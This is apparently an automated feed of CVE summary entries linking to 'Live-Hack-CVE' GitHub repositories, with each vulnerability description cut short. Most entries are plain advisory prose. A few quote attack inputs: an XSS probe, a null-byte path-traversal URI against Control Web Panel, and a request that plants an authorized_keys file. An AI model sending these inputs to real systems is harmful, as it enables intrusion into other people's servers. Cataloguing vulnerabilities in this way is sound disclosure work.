**Multiple memory corruption vulnerabilities exist in the IFFOutput alignment padding functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to arbitrary code execution. An attacker can provide malicious input to trigger these vulnerabilities.This vulnerability arises w CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43598](https://github.com/Live-Hack-CVE/CVE-2022-43598) create time: 2022-12-27T10:05:45Z

**Multiple memory corruption vulnerabilities exist in the IFFOutput alignment padding functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to arbitrary code execution. An attacker can provide malicious input to trigger these vulnerabilities.This vulnerability arises w CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43597](https://github.com/Live-Hack-CVE/CVE-2022-43597) create time: 2022-12-27T10:05:41Z

**A heap out of bounds read vulnerability exists in the OpenImageIO master-branch-9aeece7a when parsing the image file directory part of a PSD image file. A specially-crafted .psd file can cause a read of arbitrary memory address which can lead to denial of service. An attacker can provide a malicious file to trigger thi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41684](https://github.com/Live-Hack-CVE/CVE-2022-41684) create time: 2022-12-27T10:05:38Z

**An information disclosure vulnerability exists in the IFFOutput channel interleaving functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to leaked heap data. An attacker can provide malicious input to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43596](https://github.com/Live-Hack-CVE/CVE-2022-43596) create time: 2022-12-27T10:05:34Z

**A heap based buffer overflow vulnerability exists in tile decoding code of TIFF image parser in OpenImageIO master-branch-9aeece7a and v2.3.19.0. A specially-crafted TIFF file can lead to an out of bounds memory corruption, which can result in arbitrary code execution. An attacker can provide a malicious file to trigge CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41639](https://github.com/Live-Hack-CVE/CVE-2022-41639) create time: 2022-12-27T10:05:31Z

**Multiple denial of service vulnerabilities exist in the image output closing functionality of OpenImageIO Project OpenImageIO v2.4.4.2. Specially crafted ImageOutput Objects can lead to multiple null pointer dereferences. An attacker can provide malicious multiple inputs to trigger these vulnerabilities.This vulnerabil CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43595](https://github.com/Live-Hack-CVE/CVE-2022-43595) create time: 2022-12-27T10:05:27Z

**A heap out-of-bounds write vulnerability exists in the way OpenImageIO v2.3.19.0 processes RLE encoded BMP images. A specially-crafted bmp file can write to arbitrary out of bounds memory, which can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38143](https://github.com/Live-Hack-CVE/CVE-2022-38143) create time: 2022-12-27T10:05:24Z

**Multiple denial of service vulnerabilities exist in the image output closing functionality of OpenImageIO Project OpenImageIO v2.4.4.2. Specially crafted ImageOutput Objects can lead to multiple null pointer dereferences. An attacker can provide malicious multiple inputs to trigger these vulnerabilities.This vulnerabil CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43594](https://github.com/Live-Hack-CVE/CVE-2022-43594) create time: 2022-12-27T10:05:21Z

**A denial of service vulnerability exists in the DPXOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to null pointer dereference. An attacker can provide malicious input to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43593](https://github.com/Live-Hack-CVE/CVE-2022-43593) create time: 2022-12-27T10:05:17Z

**A heap out-of-bounds read vulnerability exists in the RLA format parser of OpenImageIO master-branch-9aeece7a and v2.3.19.0. More specifically, in the way run-length encoded byte spans are handled. A malformed RLA file can lead to an out-of-bounds read of heap metadata which can result in sensitive information leak. An CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36354](https://github.com/Live-Hack-CVE/CVE-2022-36354) create time: 2022-12-27T10:05:14Z

**An information disclosure vulnerability exists in the DPXOutput::close() functionality of OpenImageIO Project OpenImageIO v2.4.4.2. A specially crafted ImageOutput Object can lead to leaked heap data. An attacker can provide malicious input to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43592](https://github.com/Live-Hack-CVE/CVE-2022-43592) create time: 2022-12-27T10:05:10Z

**A denial of service vulnerability exists in the DDS native tile reading functionality of OpenImageIO Project OpenImageIO v2.3.19.0 and v2.4.4.2. A specially-crafted .dds can lead to denial of service. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41999](https://github.com/Live-Hack-CVE/CVE-2022-41999) create time: 2022-12-27T10:05:07Z

**IBM Security Verify Governance, Identity Manager 10.0.1 stores user credentials in plain clear text which can be read by a remote authenticated user. IBM X-Force ID: 225009. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22458](https://github.com/Live-Hack-CVE/CVE-2022-22458) create time: 2022-12-27T10:05:03Z

**A vulnerability, which was classified as problematic, has been found in Thomson TCW710 ST5D.10.05. This issue affects some unknown processing of the file /goform/wlanPrimaryNetwork. The manipulation of the argument ServiceSetIdentifier with the input ><script>alert(1) as part of POST Request leads to basic cro CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25034](https://github.com/Live-Hack-CVE/CVE-2018-25034) create time: 2022-12-27T08:44:15Z

**The Opera Mini application 47.1.2249.129326 for Android allows remote attackers to spoof the Location Permission dialog via a crafted web site. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-16135](https://github.com/Live-Hack-CVE/CVE-2018-16135) create time: 2022-12-27T08:34:38Z

**A vulnerability, which was classified as problematic, has been found in Hide Files on GitHub up to 2.x. This issue affects the function addEventListener of the file extension/options.js. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 3.0.0 is able to address t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25084](https://github.com/Live-Hack-CVE/CVE-2019-25084) create time: 2022-12-27T08:44:05Z

**A vulnerability was found in GNOME gvdb. It has been classified as critical. This affects the function gvdb_table_write_contents_async of the file gvdb-builder.c. The manipulation leads to use after free. It is possible to initiate the attack remotely. The name of the patch is d83587b2a364eb9a9a53be7e6a708074e252de14. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25085](https://github.com/Live-Hack-CVE/CVE-2019-25085) create time: 2022-12-27T08:38:45Z

**An issue was discovered in Illumos in Nexenta NexentaStor 4.0.5 and 5.1.2, and other products. The SMB server allows an attacker to have unintended access, e.g., an attacker with WRITE_XATTR can change permissions. This occurs because of a combination of three factors: ZFS extended attributes are used to implement NT n CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9579](https://github.com/Live-Hack-CVE/CVE-2019-9579) create time: 2022-12-27T08:35:20Z

**In Pilz PMC programming tool 3.x before 3.5.17 (based on CODESYS Development System), an attacker can identify valid usernames. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9011](https://github.com/Live-Hack-CVE/CVE-2019-9011) create time: 2022-12-27T08:35:17Z

**Realtek Audio Drivers for Windows, as used on the Lenovo ThinkPad X1 Carbon 20A7, 20A8, 20BS, and 20BT before 6.0.8882.1 and 20KH and 20KG before 6.0.8907.1 (and on many other Lenovo and non-Lenovo products), mishandles DLL preloading. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19705](https://github.com/Live-Hack-CVE/CVE-2019-19705) create time: 2022-12-27T08:35:13Z

**In certain Citrix products, information disclosure can be achieved by an authenticated VPN user when there is a configured SSL VPN endpoint. This affects Citrix ADC and Citrix Gateway 13.0-58.30 and later releases before the CTX276688 update. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18177](https://github.com/Live-Hack-CVE/CVE-2019-18177) create time: 2022-12-27T08:35:10Z

**HashiCorp Nomad 0.5.0 through 0.9.4 (fixed in 0.9.5) reveals unintended environment variables to the rendering task during template rendering, aka GHSA-6hv3-7c34-4hx8. This applies to nomad/client/allocrunner/taskrunner/template. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14802](https://github.com/Live-Hack-CVE/CVE-2019-14802) create time: 2022-12-27T08:35:06Z

**Sierra Wireless MGOS before 3.15.2 and 4.x before 4.3 allows attackers to read log files via a Direct Request (aka Forced Browsing). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13988](https://github.com/Live-Hack-CVE/CVE-2019-13988) create time: 2022-12-27T08:35:03Z

**Cloud Native Computing Foundation Harbor before 1.10.3 and 2.x before 2.0.1 allows resource enumeration because unauthenticated API calls reveal (via the HTTP status code) whether a resource exists. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19030](https://github.com/Live-Hack-CVE/CVE-2019-19030) create time: 2022-12-27T08:34:49Z

**The ACENet service in Sierra Wireless ALEOS before 4.4.9, 4.5.x through 4.9.x before 4.9.5, and 4.10.x through 4.13.x before 4.14.0 allows remote attackers to execute arbitrary code via a buffer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11851](https://github.com/Live-Hack-CVE/CVE-2019-11851) create time: 2022-12-27T08:34:42Z

**The ECDSA signature implementation in ecdsa.c in Arm Mbed Crypto 2.1 and Mbed TLS through 2.19.1 does not reduce the blinded scalar before computing the inverse, which allows a local attacker to recover the private key via side-channel attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18222](https://github.com/Live-Hack-CVE/CVE-2019-18222) create time: 2022-12-27T08:34:22Z

**Arm Mbed TLS before 2.19.0 and Arm Mbed Crypto before 2.0.0, when deterministic ECDSA is enabled, use an RNG with insufficient entropy for blinding, which might allow an attacker to recover a private key via side-channel attacks if a victim signs the same message many times. (For Mbed TLS, the fix is also available in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16910](https://github.com/Live-Hack-CVE/CVE-2019-16910) create time: 2022-12-27T08:34:19Z

**A vulnerability classified as critical was found in SimbCo httpster. This vulnerability affects the function fs.realpathSync of the file src/server.coffee. The manipulation leads to path traversal. The exploit has been disclosed to the public and may be used. The name of the patch is d3055b3e30b40b65d30c5a06d6e053dffa7 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36629](https://github.com/Live-Hack-CVE/CVE-2020-36629) create time: 2022-12-27T09:14:27Z

**A vulnerability classified as critical has been found in Calsign APDE. This affects the function handleExtract of the file APDE/src/main/java/com/calsignlabs/apde/build/dag/CopyBuildTask.java of the component ZIP File Handler. The manipulation leads to path traversal. Upgrading to version 0.5.2-pre2-alpha is able to ad CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36628](https://github.com/Live-Hack-CVE/CVE-2020-36628) create time: 2022-12-27T09:14:23Z

**A vulnerability was found in Macaron i18n. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file i18n.go. The manipulation leads to open redirect. The attack can be launched remotely. Upgrading to version 0.5.0 is able to address this issue. The name of the patch is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36627](https://github.com/Live-Hack-CVE/CVE-2020-36627) create time: 2022-12-27T09:14:20Z

**A vulnerability, which was classified as critical, was found in hughsk flat up to 5.0.0. This affects the function unflatten of the file index.js. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). It is possible to initiate the attack remotely. Upgradin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36632](https://github.com/Live-Hack-CVE/CVE-2020-36632) create time: 2022-12-27T08:43:05Z

**A vulnerability was found in barronwaffles dwc_network_server_emulator. It has been declared as critical. This vulnerability affects the function update_profile of the file gamespy/gs_database.py. The manipulation of the argument firstname/lastname leads to sql injection. The attack can be initiated remotely. The name CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36631](https://github.com/Live-Hack-CVE/CVE-2020-36631) create time: 2022-12-27T08:43:01Z

**A vulnerability was found in FreePBX cdr 14.0. It has been classified as critical. This affects the function ajaxHandler of the file ucp/Cdr.class.php. The manipulation of the argument limit/offset leads to sql injection. Upgrading to version 14.0.5.21 is able to address this issue. The name of the patch is f1a9eea2dff CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36630](https://github.com/Live-Hack-CVE/CVE-2020-36630) create time: 2022-12-27T08:42:48Z

**An issue was discovered in Arm Mbed TLS before 2.24.0. It incorrectly uses a revocationDate check when deciding whether to honor certificate revocation via a CRL. In some situations, an attacker can exploit this by changing the local clock. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36425](https://github.com/Live-Hack-CVE/CVE-2020-36425) create time: 2022-12-27T08:41:36Z

**An issue was discovered in Arm Mbed TLS before 2.24.0. An attacker can recover a private key (for RSA or static Diffie-Hellman) via a side-channel attack against generation of base blinding/unblinding values. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36424](https://github.com/Live-Hack-CVE/CVE-2020-36424) create time: 2022-12-27T08:41:32Z

**An issue was discovered in Arm Mbed TLS before 2.23.0. A remote attacker can recover plaintext because a certain Lucky 13 countermeasure doesn't properly consider the case of a hardware accelerator. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36423](https://github.com/Live-Hack-CVE/CVE-2020-36423) create time: 2022-12-27T08:41:29Z

**An issue was discovered in Arm Mbed TLS before 2.23.0. A side channel allows recovery of an ECC private key, related to mbedtls_ecp_check_pub_priv, mbedtls_pk_parse_key, mbedtls_pk_parse_keyfile, mbedtls_ecp_mul, and mbedtls_ecp_mul_restartable. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36422](https://github.com/Live-Hack-CVE/CVE-2020-36422) create time: 2022-12-27T08:41:25Z

**An issue was discovered in Arm Mbed TLS before 2.24.0. mbedtls_x509_crl_parse_der has a buffer over-read (of one byte). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36426](https://github.com/Live-Hack-CVE/CVE-2020-36426) create time: 2022-12-27T08:41:22Z

**An issue was discovered in Arm Mbed TLS before 2.23.0. Because of a side channel in modular exponentiation, an RSA private key used in a secure enclave could be disclosed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36421](https://github.com/Live-Hack-CVE/CVE-2020-36421) create time: 2022-12-27T08:41:18Z

**An issue was discovered in Mbed TLS before 2.25.0 (and before 2.16.9 LTS and before 2.7.18 LTS). A NULL algorithm parameters entry looks identical to an array of REAL (size zero) and thus the certificate is considered valid. However, if the parameters do not match in any way, then the certificate should be considered i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36478](https://github.com/Live-Hack-CVE/CVE-2020-36478) create time: 2022-12-27T08:41:15Z

**An issue was discovered in Mbed TLS before 2.24.0 (and before 2.16.8 LTS and before 2.7.17 LTS). There is missing zeroization of plaintext buffers in mbedtls_ssl_read to erase unused application data from memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36476](https://github.com/Live-Hack-CVE/CVE-2020-36476) create time: 2022-12-27T08:41:11Z

**An issue was discovered in Mbed TLS before 2.25.0 (and before 2.16.9 LTS and before 2.7.18 LTS). The calculations performed by mbedtls_mpi_exp_mod are not limited; thus, supplying overly large parameters could lead to denial of service when generating Diffie-Hellman key pairs. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36475](https://github.com/Live-Hack-CVE/CVE-2020-36475) create time: 2022-12-27T08:41:08Z

**In Pilz PMC programming tool 3.x before 3.5.17 (based on CODESYS Development System), the password-hashing feature requires insufficient computational effort. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12069](https://github.com/Live-Hack-CVE/CVE-2020-12069) create time: 2022-12-27T08:35:35Z

**In Pilz PMC programming tool 3.x before 3.5.17 (based on CODESYS Development System), a user's password may be changed by an attacker without knowledge of the current password. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12067](https://github.com/Live-Hack-CVE/CVE-2020-12067) create time: 2022-12-27T08:35:31Z

**Sierra Wireless AirLink Mobility Manager (AMM) before 2.17 mishandles sessions and thus an unauthenticated attacker can obtain a login session with administrator privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11101](https://github.com/Live-Hack-CVE/CVE-2020-11101) create time: 2022-12-27T08:35:24Z

**The console in Togglz before 2.9.4 allows CSRF. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28191](https://github.com/Live-Hack-CVE/CVE-2020-28191) create time: 2022-12-27T08:34:55Z

**Shilpi CAPExWeb 1.1 allows SQL injection via a servlet/capexweb.cap_sendMail GET request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24600](https://github.com/Live-Hack-CVE/CVE-2020-24600) create time: 2022-12-27T08:34:51Z

**Arm Mbed TLS before 2.16.5 allows attackers to obtain sensitive information (an RSA private key) by measuring cache usage during an import. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10941](https://github.com/Live-Hack-CVE/CVE-2020-10941) create time: 2022-12-27T08:34:34Z

**A Lucky 13 timing side channel in mbedtls_ssl_decrypt_buf in library/ssl_msg.c in Trusted Firmware Mbed TLS through 2.23.0 allows an attacker to recover secret key information. This affects CBC mode because of a computed time difference based on a padding length. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16150](https://github.com/Live-Hack-CVE/CVE-2020-16150) create time: 2022-12-27T08:34:30Z

**An issue was discovered in Arm Mbed TLS before 2.16.6 and 2.7.x before 2.7.15. An attacker that can get precise enough side-channel measurements can recover the long-term ECDSA private key by (1) reconstructing the projective coordinate of the result of scalar multiplication by exploiting side channels in the conversio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10932](https://github.com/Live-Hack-CVE/CVE-2020-10932) create time: 2022-12-27T08:34:26Z

**A deserialization flaw was discovered in jackson-databind through 2.9.10.4. It could allow an unauthenticated user to perform code execution via ignite-jta or quartz-core: org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup, org.apache.ignite.cache.jta.jndi.CacheJndiTmFactory, and org.quartz.utils.JNDIConnectionProvider CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10650](https://github.com/Live-Hack-CVE/CVE-2020-10650) create time: 2022-12-27T08:34:07Z

**A vulnerability, which was classified as problematic, has been found in fredsmith utils. This issue affects some unknown processing of the file screenshot_sync of the component Filename Handler. The manipulation leads to predictable from observable state. The name of the patch is dbab1b66955eeb3d76b34612b358307f5c4e394 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4277](https://github.com/Live-Hack-CVE/CVE-2021-4277) create time: 2022-12-27T09:14:30Z

**A vulnerability classified as problematic has been found in cronvel tree-kit up to 0.6.x. This affects an unknown part. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). Upgrading to version 0.7.0 is able to address this issue. The name of the patch is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4278](https://github.com/Live-Hack-CVE/CVE-2021-4278) create time: 2022-12-27T08:44:08Z

**A vulnerability was found in LinkedIn dustjs up to 2.x and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The attack may be launched remotely. The exploit has been discl CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4264](https://github.com/Live-Hack-CVE/CVE-2021-4264) create time: 2022-12-27T08:43:47Z

**A vulnerability was found in styler_praat_scripts. It has been classified as problematic. Affected is an unknown function of the file file_segmenter.praat of the component Slash Handler. The manipulation leads to denial of service. It is possible to launch the attack remotely. The name of the patch is 0cad44aa4a3eb0ecd CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4280](https://github.com/Live-Hack-CVE/CVE-2021-4280) create time: 2022-12-27T08:43:12Z

**A vulnerability has been found in Starcounter-Jack JSON-Patch up to 3.1.0 and classified as problematic. This vulnerability affects unknown code. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The attack can be initiated remotely. The exploit has bee CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4279](https://github.com/Live-Hack-CVE/CVE-2021-4279) create time: 2022-12-27T08:43:08Z

**Mbed TLS before 3.0.1 has a double free in certain out-of-memory conditions, as demonstrated by an mbedtls_ssl_set_session() failure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44732](https://github.com/Live-Hack-CVE/CVE-2021-44732) create time: 2022-12-27T08:41:05Z

**A Denial of Service vulnerability exists in mbed TLS 3.0.0 and earlier in the mbedtls_pkcs12_derivation function when an input password's length is 0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43666](https://github.com/Live-Hack-CVE/CVE-2021-43666) create time: 2022-12-27T08:41:01Z

**In CWP (aka Control Web Panel or CentOS Web Panel) before 0.9.8.1107, an unauthenticated attacker can use %00 bytes to cause /user/loader.php to register an arbitrary API key, as demonstrated by a /user/loader.php?api=1&scripts= .%00./.%00./api/account_new_create&acc=guadaapi URI. Any number of %00 instances can be use CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45467](https://github.com/Live-Hack-CVE/CVE-2021-45467) create time: 2022-12-27T08:40:20Z

**In CWP (aka Control Web Panel or CentOS Web Panel) before 0.9.8.1107, attackers can make a crafted request to api/?api=add_server&DHCP= to add an authorized_keys text file in the /resources/ folder. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45466](https://github.com/Live-Hack-CVE/CVE-2021-45466) create time: 2022-12-27T08:40:16Z

**An issue was discovered in MediaWiki before 1.35.5, 1.36.x before 1.36.3, and 1.37.x before 1.37.1. There is Blind Stored XSS via a URL to the Upload Image feature. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44855](https://github.com/Live-Hack-CVE/CVE-2021-44855) create time: 2022-12-27T08:40:13Z

**An issue was discovered in MediaWiki before 1.35.5, 1.36.x before 1.36.3, and 1.37.x before 1.37.1. The REST API publicly caches results from private wikis. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44854](https://github.com/Live-Hack-CVE/CVE-2021-44854) create time: 2022-12-27T08:40:09Z

**Heimdal before 7.7.1 allows attackers to cause a NULL pointer dereference in a SPNEGO acceptor via a preferred_mech_type of GSS_C_NO_OID and a nonzero initial_response value to send_accept. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44758](https://github.com/Live-Hack-CVE/CVE-2021-44758) create time: 2022-12-27T08:40:04Z

**An issue was discovered in MediaWiki before 1.35.5, 1.36.x before 1.36.3, and 1.37.x before 1.37.1. A title blocked by AbuseFilter can be created via Special:ChangeContentModel due to the mishandling of the EditFilterMergedContent hook return value. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44856](https://github.com/Live-Hack-CVE/CVE-2021-44856) create time: 2022-12-27T08:39:27Z

**An issue was discovered in illumos before f859e7171bb5db34321e45585839c6c3200ebb90, OmniOS Community Edition r151038, OpenIndiana Hipster 2021.04, and SmartOS 20210923. A local unprivileged user can cause a deadlock and kernel panic via crafted rename and rmdir calls on tmpfs filesystems. Oracle Solaris 10 and 11 is al CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43395](https://github.com/Live-Hack-CVE/CVE-2021-43395) create time: 2022-12-27T08:39:24Z

**In Philips (formerly Carestream) Vue MyVue PACS through 12.2.x.x, the VideoStream function allows Path Traversal by authenticated users to access files stored outside of the web root. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39369](https://github.com/Live-Hack-CVE/CVE-2021-39369) create time: 2022-12-27T08:39:20Z

**golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38561](https://github.com/Live-Hack-CVE/CVE-2021-38561) create time: 2022-12-27T08:39:17Z

**fastrack Reflex 2.0 W307S_REFLEX_v90.89 Activity Tracker allows physically proximate attackers to dump the firmware, flash custom malicious firmware, and brick the device via the Serial Wire Debug (SWD) feature. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35954](https://github.com/Live-Hack-CVE/CVE-2021-35954) create time: 2022-12-27T08:39:14Z

**fastrack Reflex 2.0 W307S_REFLEX_v90.89 Activity Tracker allows a Remote attacker to cause a Denial of Service (device outage) via crafted choices of the last three bytes of a characteristic value. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35953](https://github.com/Live-Hack-CVE/CVE-2021-35953) create time: 2022-12-27T08:39:10Z

**fastrack Reflex 2.0 W307S_REFLEX_v90.89 Activity Tracker allows a Remote attacker to change the time, date, and month via Bluetooth LE Characteristics on handle 0x0017. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35952](https://github.com/Live-Hack-CVE/CVE-2021-35952) create time: 2022-12-27T08:39:06Z

**fastrack Reflex 2.0 W307S_REFLEX_v90.89 Activity Tracker allows an Unauthenticated Remote attacker to send a malicious firmware update via BLE and brick the device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35951](https://github.com/Live-Hack-CVE/CVE-2021-35951) create time: 2022-12-27T08:39:02Z

**The glob-parent package before 6.0.1 for Node.js allows ReDoS (regular expression denial of service) attacks against the enclosure regular expression. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35065](https://github.com/Live-Hack-CVE/CVE-2021-35065) create time: 2022-12-27T08:38:58Z

**php-mod/curl (a wrapper of the PHP cURL extension) before 2.3.2 allows XSS via the post_file_path_upload.php key parameter and the POST data to post_multidimensional.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30134](https://github.com/Live-Hack-CVE/CVE-2021-30134) create time: 2022-12-27T08:38:55Z

**The Menu Item Visibility Control WordPress plugin through 0.5 doesn't sanitize and validate the "Visibility logic" option for WordPress menu items, which could allow highly privileged users to execute arbitrary PHP code even in a hardened environment. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24942](https://github.com/Live-Hack-CVE/CVE-2021-24942) create time: 2022-12-27T08:38:38Z

**A vulnerability was found in Brave UX for-the-badge and classified as critical. Affected by this issue is some unknown functionality of the file .github/workflows/combine-prs.yml. The manipulation leads to os command injection. The name of the patch is 55b5a234c0fab935df5fb08365bc8fe9c37cf46b. It is recommended to appl CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4281](https://github.com/Live-Hack-CVE/CVE-2021-4281) create time: 2022-12-27T08:35:27Z

**In Trusted Firmware Mbed TLS 2.24.0, a side-channel vulnerability in base64 PEM file decoding allows system-level (administrator) attackers to obtain information about secret RSA keys via a controlled-channel and side-channel attack on software running in isolated environments that can be single stepped, especially Int CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24119](https://github.com/Live-Hack-CVE/CVE-2021-24119) create time: 2022-12-27T08:34:15Z

**A vulnerability was found in dns-stats hedgehog. It has been rated as problematic. Affected by this issue is the function DSCIOManager::dsc_import_input_from_source of the file src/DSCIOManager.cpp. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the publi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4276](https://github.com/Live-Hack-CVE/CVE-2021-4276) create time: 2022-12-27T08:33:28Z

**Out-of-bounds read was discovered in YDB server. An attacker could construct a query with insert statement that would allow him to read sensitive information from other memory locations or cause a crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28228](https://github.com/Live-Hack-CVE/CVE-2022-28228) create time: 2022-12-27T09:17:49Z

**ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47945](https://github.com/Live-Hack-CVE/CVE-2022-47945) create time: 2022-12-27T09:17:45Z

**AVEVA InTouch Access Anywhere versions 2020 R2 and older are vulnerable to a path traversal exploit that could allow an unauthenticated user with network access to read files on the system outside of the secure gateway web server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23854](https://github.com/Live-Hack-CVE/CVE-2022-23854) create time: 2022-12-27T09:17:42Z

**A link following vulnerability in the Damage Cleanup Engine component of Trend Micro Apex One and Trend Micro Apex One as a Service could allow a local attacker to escalate privileges by creating a symbolic link and abusing the service to delete a file. Please note: an attacker must first obtain the ability to execute CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45798](https://github.com/Live-Hack-CVE/CVE-2022-45798) create time: 2022-12-27T09:17:38Z

**IBM Navigator for i 7.3, 7.4, and 7.5 could allow an authenticated user to obtain sensitive information they are authorized to but not while using this interface. By performing an SQL injection an attacker could see user profile attributes through this interface. IBM X-Force ID: 239305. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43860](https://github.com/Live-Hack-CVE/CVE-2022-43860) create time: 2022-12-27T09:17:26Z

**BigFix deployments that have installed the Notification Service on Windows are susceptible to disclosing SMTP BigFix operator's sensitive data in clear text. Operators who use Notification Service related content from BES Support are at risk of leaving their SMTP sensitive data exposed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38658](https://github.com/Live-Hack-CVE/CVE-2022-38658) create time: 2022-12-27T09:17:23Z

**IBM Security Verify Governance, Identity Manager 10.01 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 224915. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22449](https://github.com/Live-Hack-CVE/CVE-2022-22449) create time: 2022-12-27T09:17:19Z

